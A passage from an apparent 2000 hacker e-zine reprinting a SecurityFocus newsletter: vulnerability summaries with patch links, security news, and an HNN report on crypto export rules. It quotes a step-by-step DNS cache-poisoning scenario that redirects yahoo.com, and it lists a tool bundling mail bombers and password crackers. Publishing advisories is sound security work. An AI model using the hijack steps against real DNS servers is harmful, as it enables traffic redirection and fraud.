easy access to information about processes (hence the name). It's typical benefit is quicker access to memory hence more streamlined operations. As noted previously certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under system which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry. 2. DNS TLD & Out of Zone NS Domain Hijacking BugTraq ID: 941 Remote: Yes Date Published: 2000-01-23 Relevant URL: http://www.securityfocus.com/bid/941 Summary: A vulnerability exists in the mechanism used by DNS, in general, to determine the name server associated with TLD's (top level domains). DNS is built upon levels of trust, and by exploiting single points of failure in this trust system, it becomes possible for an attacker to convince a caching nameserver that allows for recursion through it that the root server for a given TLD is something other than what it actually is. By consecutively performing these cache attacks, it could be possible for an attacker to entirely take over name service for any given domain. The vulnerability is actually not specific to TLD's. The same attack can be used to hijack any domain which has out of zone NS records, if any of the servers that act as the name server for the out of zone domain can be compromised. The simplest explanation was presented in the example provided by it's discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000: "Suppose an attacker can make recursive queries through your cache. Let me emphasize that this does not mean that the attacker is one of your beloved users; many programs act as DNS query-tunneling tools. Suppose the attacker is also able, somehow, to take over ns2.netsol.com. This isn't one of the .com servers, but it's a name server for the gtld-servers.net domain. Here's what happens: (1) The attacker asks your cache about z.com. Your cache contacts (say) k.root-servers.net, which provides a referral: com NS j.gtld-servers.net (among others) j.gtld-servers.net A 198.41.0.21 These records are cached. (2) The attacker asks your cache about z.gtld-servers.net. Your cache contacts (say) f.root-servers.net, which provides a referral: gtld-servers.net NS ns2.netsol.com (among others) ns2.netsol.com A 207.159.77.19 These records are cached. (3) The attacker takes over ns2.netsol.com. (4) The attacker asks your cache about zz.gtld-servers.net. Your cache contacts ns2.netsol.com, and the attacker answers: zz.gtld-servers.net CNAME j.gtld-servers.net j.gtld-servers.net A 1.2.3.4 These records are cached, wiping out the obsolete j glue. (5) A legitimate user asks your cache about yahoo.com. Your cache contacts j.gtld-servers.net, and the attacker answers: yahoo.com A 1.2.3.4 The user contacts yahoo.com at that address." The attack offered requires that an attacker be able to compromise the operation of the DNS server running on, in this case, ns2.netsol.com, although this is not the only server that could potentially be used to launch an attack of this style. The author further indicates that there are in excess of 200 servers that could be used to manipulate resolution of all the .COM domains. 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability BugTraq ID: 942 Remote: Yes Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/942 Summary: Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail. 4. VMware Symlink Vulnerability BugTraq ID: 943 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/943 Summary: VMware is software that runs multiple virtual computers on a single PC, at the same time, without partitioning or rebooting. Certain versions of the VMWare for Linux product do not perform /tmp file sanity checking and create files in the /tmp directory which will follow symlinks. This may be used by a malicious user to overwrite any file (with log data) which falls within the write permissions of the user ID which VMWare excecutes as. Typically this is root. This attack will most likely result in a denial of service and not a root level compromise. 5. HP Path MTU Discovery DoS Vulnerability BugTraq ID: 944 Remote: Yes Date Published: 2000-01-24 Relevant URL: http://www.securityfocus.com/bid/944 Summary: A potential denial of service exists in Hewlett-Packard's proprietary protocol for discovering the maximum path MTU (PMTU) for a give connection. This feature could potentially be used to cause denial of services, using HPUX machines as "amplifiers." Essentially, HP machines which are vulnerable can, under certain conditions, be coerced in to sending far more data outbound than they receive inbound. By forging source addresses, it is possible to send a small quantity of packets purporting to be from a given source, and cause the HPUX machine to send multiple packets in response. This could potentially be used as a denial of service. HP's proprietary path discover protocol works by sending data in parallel with ICMP packets being used for path discovery. While exact details of the nature of the denial of service were not made public, presumably it could be possible to utilize UDP packets, and default UDP services to start the chain of events leading to a denial of service 6. Microsoft East Asian Word Conversion Vulnerability BugTraq ID: 946 Remote: No Date Published: 2000-01-20 Relevant URL: http://www.securityfocus.com/bid/946 Summary: East Asian language versions of Word and Powerpoint are susceptible to a buffer overflow exploit. The overflowable buffer is in the code that converts Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically convert older files into the new format upon loading. If a specially-modified Chinese, Japanese or Korean Word 5 document is loaded into a newer version of Word or PowerPoint, arbitrary code can be executed during the conversion process, at the privilege level of the current user. 7. NT RDISK Registry Enumeration File Vulnerability BugTraq ID: 947 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/947 Summary: The Rdisk utility shipped with all versions of Windows NT4.0 is used to make an Emergency Repair Disk. During the creation of this disk, a temporary file ($$hive$$.tmp) is created in the %systemroot%\repair directory that contains the registry hives while they are being backed up. The group Everyone has Read permission to this file, and in this manner sensitive information about the server could be leaked. The file is put in a location that is not shared by default, and is removed immediately after the disk is created. The only likely scenario where this could be exploited is in the case of NT Terminal Server, where an administrator and a regular user could both be logged in interactively at the same time. 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability BugTraq ID: 948 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/948 Summary: There is a remotely exploitable buffer overflow in Qaulcomm's 'qpopper' daemon which allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code to handles the 'LIST' command available to logged in users. By providing an overly long user supplied argument a buffer may be overflowed resulting in the attacker gaining access with the user ID (UID) of the user who's account is being used for the attack and the group ID (GID) mail. This will result in remote access to the server itself and possibly (depending on how the machine is configured) access to read system users mail via the GID mail. 9. NT Index Server Directory Traversal Vulnerability BugTraq ID: 950 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/950 Summary: Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker. III. PATCH UPDATES 2000-01-24 to 2000-01-30 ------------------------------------------- 1. Vendor: Qualcomm Product: Qpopper Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow Bugtraq ID: 948 Relevant URLS: http://www.eudora.com/freeware/qpop.html#BUFFER http://www.securityfocus.com/bid/948 Patch Location: ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z 2. Vendor: Microsoft Product: Index Server for Windows NT and 2000 Vulnerability Patched: NT Index Server Directory Traversal Bugtraq ID: 950 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/950 Patch Locations: Index Server 2.0: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728 Indexing Services for Windows 2000: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726 3. Vendor: OpenBSD Product: OpenBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.openbsd.org/errata.html http://www.securityfocus.com/bid/940 Patch Location: http://www.openbsd.org/errata.html#procfs 4. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.freebsd.org/security/ http://www.securityfocus.com/bid/940 Patch Location: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch 5. Vendor: Inter7 Product: vpopmail Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow Bugtraq ID: 942 Relevant URLS: http://www.inter7.com/ http://www.securityfocus.com/bid/942 Patch Location: http://www.inter7.com/vpopmail/ (version 3.1.11e) 6. Vendor: Microsoft Product: NT 4.0 Terminal Server Edition Vulnerability Patched: NT RDISK Registry Enumeration File Bugtraq ID: 947 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/947 Patch Location: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384 7. Vendor: Microsoft Product: Office (All versions, including word and powerpoint) Vulnerability Patched: Microsoft East Asian Word Conversion Bugtraq ID: 946 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/946 Patch Locations: - Word 97 or 98, PowerPoint 98: - US: http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm China: http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm - Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint 2000: - US: http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm China: http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm 8. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition Bugtraq ID: 939 Relevant URLS: http://www.freebsd.org/security http://www.securityfocus.com/bid/939 Patch locations: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES ----------------------------------------- 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) Excerpt: While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. Relevant URL: http://www.wired.com/news/technology/0,1282,33842,00.html 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) Excerpt: Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Relevant URL: http://news.excite.com/news/r/000125/00/net-japan-hackers 3. Task Force Battles Online Criminals (Wed Jan 26 2000) Excerpt: Ground zero in California's war against Internet crime is behind a dumpster hard by a hamburger stand in a faded Sacramento County welfare building. This is the headquarters of the Sacramento Valley high-tech task force, a multi-agency law enforcement team dedicated to tracking down e-crime, from stock swindlers to child pornographers. Relevant URL: http://www.latimes.com/news/asection/20000126/t000008196.html 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) Excerpt: In another case destined to fuel e-commerce anxieties, a Parisian computer programmer is facing counterfeiting and fraud charges after developing a homemade "smart card" that he says gave him the ability to fraudulently purchase goods and services throughout France. Relevant URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) Excerpt: Visa International Inc. acknowledged this week that computer crackers broke into several servers in its global network last July and stole information. The company said that in December, it received a phone call and an e-mail demanding money in exchange for the data. Relevant URL: http://www.computerworld.com/home/print.nsf/all/000128e45a 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) Excerpt: In its review of the last 12 months, Sophos, the IT security firm, says that 1999 turned out to be a year when mass-mailed viruses arrived and dominated the scene. The annual review says that virus writers are now taking advantage of the Internet and corporate e-mail systems to distribute their creations more quickly. Relevant URL: http://www.currents.net/newstoday/00/01/28/news8.html V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Got scanned again (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro 2. Unusual scan pattern (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss 3. Possible Probe = Possible Malfunction (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com 4. No Idea (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu 5. PC Anywhere client seems to probe class C of connected networks (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com 6. unapproved AXFR (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com 8. Anti-Death Penalty (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain 9. Strange DNS/TCP activity (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com 10. eri? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu 11. source port 321 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com 12. Korea (again) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net 13. BOGUS.IvCD File (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com 14. port 768 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz 15. Extrange named messages (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti 16. Probes to tcp 2766 ('System V Listner') (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org 17. Possible attempt at hacking? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au 18. DNS update queries: another sort of suspicious activity. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30 ---------------------------------------------------------- 1. Shadow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu 2. things to break.. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com 3. HTTP scanners? (summary, long) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com 4. CGI insecurities (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net 5. ICQ Pass Cracker. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au 6. File Share Vacuum (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no 7. IIS4.0 .htw vulnerability (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com 8. Napster a little insecure? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br 9. distributed.net and seti@home (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------------- Seeking Employment: 1. Prashant Vijay (Summer Internship) Resume at: http://www.securityfocus.com/templates/archive.pike?list=77&msg=NDBBJEJEALCFECNEOEHPMEKBCAAA.vijay@eecs.tulane.edu&part=.1 Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) Reply to: Samuel Cure Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000124212259.7741.qmail@securityfocus.com 2. Practice Manager w/PKI experience NYC, Philly or DC) Reply to: Erik Voss Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=00d201bf6832$f9cd5460$6775010a@saratoga3 3. Lead Security Engineer - Bay Area/San Jose Reply to: Sanjeev Kumar Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127015859.1308.qmail@securityfocus.com 4. Senior security engineers - Bay Area/San Jose Reply to: Erik Voss Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127020135.1478.qmail@securityfocus.com 5. Virus coder wanted (San Antonio, TX) Reply to: Drissel, James W. Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil 6. Junior Security Engineers Needed (Maryland) Reply to: Brian Mitchell Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=NCBBKIMIMKKMLDMGEHFKAEAKENAA.bmitchell@icscorp.com VIII. SECURITY SURVEY 2000-01-24 to 2000-01-30 ---------------------------------------------- Our current month long survey is: "Do you think security vendors exaggerate the importance of security issues as a marketing strategy?" Never 6% / 10 votes Rarely 30% / 48 votes Often 47% / 74 votes Always 14% / 23 votes Total number of votes: 155 votes IX. SECURITY FOCUS TOP 6 TOOLS 2000-01-24 to 2000-01-30 -------------------------------------------------------- 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) by RedShadow Relevant URL: http://www.rsh.kiev.ua Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack (definitions of the password by a method of search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And more other functions 2. SecurityFocus.com Pager (Win95/98/NT) by SecurityFocus.com Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 3. lidentd 1.0p1 (Linux) by Drago, drago@drago.com Relevant URL: http://www.securityfocus.com/data/tools/lidentd-v1.0p1.tgz lidentd is an identd replacement with many features including fake users, random fake users , restricted fake user responses, matching against the passwd file for fake responses and more. 4. Cgi Sonar 1.0 (any system supporting perl) by M.e.s.s.i.a.h Relevant URL: http://www.securityfocus.com/data/tools/CgiSonar.pl.gz 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) by Craig Rowland, crowland@psionic.com Relevant URL: http://www.securityfocus.com/data/tools/logcheck-1.1.1.tar.gz Logcheck is part of the Abacus Project of security tools. It is a program created to help in the processing of UNIX system logfiles generated by the various Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper and Log Daemon packages, and the Firewall Toolkit) by Trusted Information Systems Inc.(TIS). Logcheck also works very well at reporting on other common operating system security violations and strange events. 6. Secret Sharer 1.0 1.0 (Windows 95/98) by Joel McNamara, joelm@eskimo.com Relevant URL: http://www.securityfocus.com/data/tools/secs.zip Secret Sharer is designed to help people keep secure back-up copies of sensitive data such as PGP (or other cryptosystem) passphrases and confidential files. X. SPONSOR INFORMATION - CORE SDI ------------------------------------------ CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assesment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America. URL: http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. @HWA 35.0 HNN: Jan 17: NY Student Arrested After Damaging School Computer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A high school student in Long Island New York has been arrested for electronically breaking into his schools computer system. He has been charged with computer tampering and unauthorized use of a computer. Police say that he was caught after bragging about the intrusion to friends and teachers. Damage was estimated at $3,000. WABC News http://abcnews.go.com/local/wabc/news/32275_1142000.html High School Hacker Arrested Long Island authorities have arrested a 17-year-old high school student for hacking into his school district's computer. Suffolk County authorities are charging Keith Billig with computer tampering and unauthorized use of a computer. Billig's is a student at Hauppauge High School. On Wednesday, authorities say Billig gained access to the school district's main frame computer. He allegedly was able to attain the password of every administrator, teacher and student in the district. The computer's internal security system was able to detect Billig's intrusion in the early stages. Police say Billig's bragging about his exploits to teachers and other students is what led them to him. Authorities are not sure what Billig's motive for breaking into the computer system was. Authorities estimate the damage done to the school district's computer system at $3,000. @HWA Where do these guys get these figures from? any sysadmin worth his salt can secure the system in less than an hour... do they get paid $3k/hr down there?? - Ed 36.0 HNN: Jan 17: NSA Wants A Secure Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Benjamin The NSA has contracted Secure Computing as a sole source provider for a new Linux based secure OS. Secure Computing will integrate its patented Type Enforcement technology they use for the Sidewinder firewall at the OS level. The technology is scheduled to be made available to the public as well as the NSA. PR Newswire - via Yahoo http://biz.yahoo.com/prnews/000113/ca_secure__1.html Thursday January 13, 8:02 am Eastern Time Company Press Release SOURCE: Secure Computing Corporation National Security Agency Selects Secure Computing to Provide Type Enforcement(TM) on Linux OS Secure Computing First to Develop Strong Security Platform for Linux SAN JOSE, Calif., Jan. 13 /PRNewswire/ -- Secure Computing Corporation (Nasdaq: SCUR - news), today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications. The NSA is the nation's high-technology cryptologic organization that ensures important and sensitive activities in the US intelligence community are protected from exploitation through interception, unauthorized access, or related technical intelligence threats. Secure Computing's patented Type Enforcement technology provides network security protection that is unique to the industry. This technology, first developed under previous government contracts, is available today as part of the UNIX OS for Secure Computing's Sidewinder(TM) firewall. Type Enforcement secures underlying operating systems and protects applications and network services, by segmenting them into domains. Each domain is granted permission to access only specific file types, including executables. As such, each domain provides a self-contained, discrete layer of protection that cannot be altered. Implementing Type Enforcement within the operating system itself assures the highest level of security available in commercial operating systems. ``The NSA has been a long standing customer and partner of Secure Computing,'' said Chris Filo, vice president and general manager of the Advanced Technology Division at Secure Computing. ``Working with the NSA allows Secure to continue to advance the state of the art in security technologies that is required to enable safe, secure operating environments within the Department of Defense (DoD), while at the same time, providing the basis for our future commercial products.'' Linux is a UNIX-type operating system that includes true multitasking, virtual memory, shared libraries, demand loading, proper memory management, TCP/IP networking, and other features consistent with Unix-type systems. The Linux source code is freely available to everyone. About the National Security Agency The National Security Agency (NSA) is the nation's cryptologic organization, tasked with making and breaking codes and ciphers. NSA is a high-technology organization, working on the very frontiers of communications and data processing. The expertise and knowledge it develops provide the government with systems that deny foreign powers knowledge of US capabilities and intentions. The NSA is charged with two of the most important and sensitive activities in the US intelligence community. The information systems security or INFOSEC mission provides leadership, products, and services to protect classified and unclassified national security systems against exploitation through interception, unauthorized access, or related technical intelligence threats. The second activity is the foreign signals intelligence or SIGINT mission, which allows for an effective, unified organization and control of all the foreign signals collection and processing activities of the United States. About Secure Computing Headquartered in San Jose, California, Secure Computing Corporation is a global leader in providing safe, secure extranets for e-business. Secure Computing solutions provide authentication, authorization and secure network access. Secure Computing's worldwide partners and customer base are counted among the Fortune 50 in financial services, healthcare, telecom, communications, manufacturing, technology and Internet service providers, as well as some of the largest agencies of the United States government. For more information, visit Secure Computing Corporation at www.securecomputing.com, or by calling: in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440, in the U.S., 800-379-4944, or 408-918-6100. NOTE: All trademarks, tradenames or service marks used or mentioned herein belong to their respective owners. This press release contains forward-looking statements relating to the anticipated delivery of Secure Computing's Type Enforcement technology on the Linux operating system and the expected benefits of such technology, and such statements involve a number of risks and uncertainties. Among the important factors that could cause actual results to differ materially from those indicated by such forward-looking statements are delays in product development, competitive pressures, technical difficulties, changes in customer requirements, general economic conditions and the risk factors detailed from time to time in Secure Computing's periodic reports and registration statements filed with the Securities and Exchange Commission. SOURCE: Secure Computing Corporation @HWA 37.0 HNN: Jan 17: Cryptome may be breaking the law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Cryptom May Be Violating the Law contributed by White Vampire Leading Internet civil liberties groups said today that new encryption export regulations released by the U.S. Commerce Department fall short of the Clinton Administration's promise to deregulate the privacy-enhancing technology. One example of this concerns the popular Internet site Cryptom where PGP is made freely available to anyone in the world who wants it. It is unclear with the new regulations whether this is a criminal act or not. Wired http://www.wired.com/news/politics/0,1283,33672,00.html Is This Man a Crypto Criminal? by Declan McCullagh 3:00 a.m. 15.Jan.2000 PST Crypto maven John Young has a problem. He may be a felon, guilty of a federal crime punishable by years in prison. Or he may not be. He'd just like to know one way or another. The 63-year-old architect and owner of the popular Cryptome site has posted a copy of PGP (Pretty Good Privacy) encryption software for the world to download. Also: He Digs 'Through' Gov't Muck More Infostructure in Wired News Read more Politics -- from Wired News PGP, an encryption program that lets users scramble files and email, has become one of the most popular crypto applications online. But people living outside the US have not been able to get it legally from a US Web site. Young's seemingly innocuous act might violate new US government regulations that restrict placing privacy-protecting crypto programs on the Web. Therein lies the uncertainty. The rules are much less onerous than the previous version, but they still apply. And they're so labyrinthine and convoluted that even lawyers who specialize in the area declined to guess whether or not Young has run afoul of President Clinton's executive order and Commerce Department regulations. "The fact that questions still remain about what does and does not violate the law demonstrates that these regulations continue to cloud the situation," said David Sobel, general counsel of the Electronic Privacy Information Center. So Young decided to be intrepid -- and perhaps risk a confrontation with the Feds. "If it's not right, someone will tell me. If I go to a lawyer to ask, they'll advise caution. Every time I go to a lawyer they advise me not to do it, so I don't go any more," he said. The Department of Commerce, which published the regulations and is in charge of arresting crypto-miscreants, declined to comment. Eugene Cottilli, a spokesman for the Commerce's bureau of export administration, could not secure an official response from government lawyers on Friday. Complicating matters is the different way that the regulations treat ready-to-use binary software, and the human-readable source code that must be compiled to be used. On Friday, Young posted a copy of PGP Freeware Version 6.5.2a for Windows and Macintosh, which contains binary code. The regulations appear to say that Americans can only distribute it online if the government has previously "reviewed and classified" the software as acceptable for distribution. Under the old rules, Web sites could distribute binary code only if they checked the Internet address of the recipient and attempted to verify that it was a computer inside the US. MIT, which makes PGP available, has a system that does just that. But Young's site doesn't include the foreigner-verification check, and he said overseas visitors have already been downloading the software. The uncertainty -- and possibility of criminal prosecution -- doesn't faze Young. "People are saying the regs are deliberately vague so you'll censor yourself, so I tend to go the other way," he said. "I'm hoping this will lead to clarification." Source code, on the other hand, is a bit freer. As long as it's not subject to an onerous license and as long as you email the site's address to the Commerce 